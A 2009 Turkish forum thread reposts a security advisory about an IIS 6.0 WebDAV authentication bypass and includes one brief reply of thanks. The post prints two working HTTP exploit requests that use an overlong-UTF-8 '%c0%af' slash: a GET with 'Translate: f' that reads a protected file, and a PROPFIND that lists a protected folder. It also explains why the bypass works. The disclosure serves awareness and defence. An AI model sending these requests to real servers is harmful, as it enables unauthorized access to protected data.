You are not logged in.

VATAN İÇİN YAŞAYIP, VATAN İÇİN ÖLDÜLER ONLAR TOPRAĞA DEĞİL, KALPLERİMİZE GÖMÜLDÜLER..

KARAPENCE

BOARD CHEF

  • male
  • "KARAPENCE" started this thread
  • Deutschland Türkei

Posts: 17,690

Date of registration: Sep 21st 2000

Location: Tokat/TÜRKIYE Hamburg/ALMANYA

Occupation: WEBMASTER

Hobbies: Güzel olan her sey

Level: 63 [?]

Experience: 75,469,781

Next Level: 86,547,382

Danksagungen: 14526

  • Send private message

Steinbock

1

Thursday, October 15th 2009, 10:09pm

IIS 6.0 Güvenlik Açığı



Microsoft'un Internet Information Server (IIS) 6.0 versiyonunda WebDav'dan kaynaklanan bir güvenlik açığı tespit edildi. Bu açıkla birlikte şifre korumalı dizinlere ulaşım sağlanabiliyor ve dosya yükleme işlemleri gerçekleştirilebiliyor. Ayrıca açık sadece WebDav klasörlerinde de geçerli değil, sunucunun barındırdığı tüm dizinleri kapsıyor.

Güvenlik uzmanı Nicolaos Rangos'un bildirdiğine göre aşağıdaki örnekteki gibi bir header gönderildiğinde korumalı bir dosya sıradan bir dosyaya dönüşebiliyor.


Source code

1
2
3
4
GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername



Bu örnekte slash (/) karakteri %c0%af unikodu ile gizlenmiş durumda ve güvenlik fonksiyonu bunu atlamakta bu nedenle /protected/protected.zip dosyasına ulaşım sağlanabiliyor. Translate: f seçeneği ise sıradan dosyalar için WebDav fonksiyonunu devreye sokuyor.

Doğrudan WebDav klasörlerine erişmek ise daha karmaşık olsada imkansız değil.



Source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>



Fakat bu yöntemlerle asp betiklerini çekebilmek mümkün değil. Benzer bir güvenlik açığı 2000 yılında IIS 4 üzerinde de tespit edilmişti. Güvenlik uzmanı Thierry Zoller bu iki güvenlik açığını kendi blogunda karşılaştırmış.

Kaynak:
http://seclists.org/fulldisclosure/2009/May/0134.html

 

Dikkat! NextDown.net den DOSYA indiremiyenler mutlaka burayı okusunlar TIKLAYINIZ

NuR

CHEF

Posts: 12,299

Level: 57 [?]

Experience: 32,192,018

Next Level: 35,467,816

Danksagungen: 557

  • Send private message

2

Saturday, October 17th 2009, 11:57am

Bilgilendirme icin tesekkurler ustam..





Counter:

Hits today: 236 | Hits yesterday: 2,677 | Hits record: 9,256 | Hits total: 761,797 Average hits: 2,216.48 | Clicks today: 7,711 | Clicks yesterday: 24,461 | Clicks total: 6,438,839 | Clicks record: 60,478 | Clicks avarage: 18,734.03 Counter age (days): 343.7 | Counts since: Jun 18th 2011, 2:13pm

Zirve1 en iyi Türk Siteleri
Zirve1 en iyi Türk Siteleri